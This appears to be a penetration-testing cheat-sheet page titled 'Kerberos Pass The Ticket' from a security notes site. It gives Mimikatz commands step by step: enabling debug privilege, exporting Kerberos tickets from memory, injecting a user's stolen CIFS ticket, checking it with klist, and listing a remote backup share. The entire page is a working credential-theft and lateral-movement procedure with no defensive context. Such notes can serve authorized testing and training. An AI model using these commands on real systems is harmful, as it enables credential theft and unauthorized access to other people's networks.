> For the complete documentation index, see [llms.txt](https://tamagosecurity.gitbook.io/notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://tamagosecurity.gitbook.io/notes/active-directory/kerberos-pass-the-ticket.md).

# Kerberos Pass The Ticket

{% stepper %}
{% step %}

### privilege::debug

```
privilege::debug
sekurlsa::tickets /export
```

{% endstep %}

{% step %}

### dir \*.kirbi

```
dir *.kirbi
```

{% endstep %}

{% step %}

### kerberos::ptt

```
kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi
```

{% endstep %}

{% step %}

### klist

```
klist
```

{% endstep %}

{% step %}

### ls \web04\backup

```
ls \\web04\backup
```

{% endstep %}
{% endstepper %}
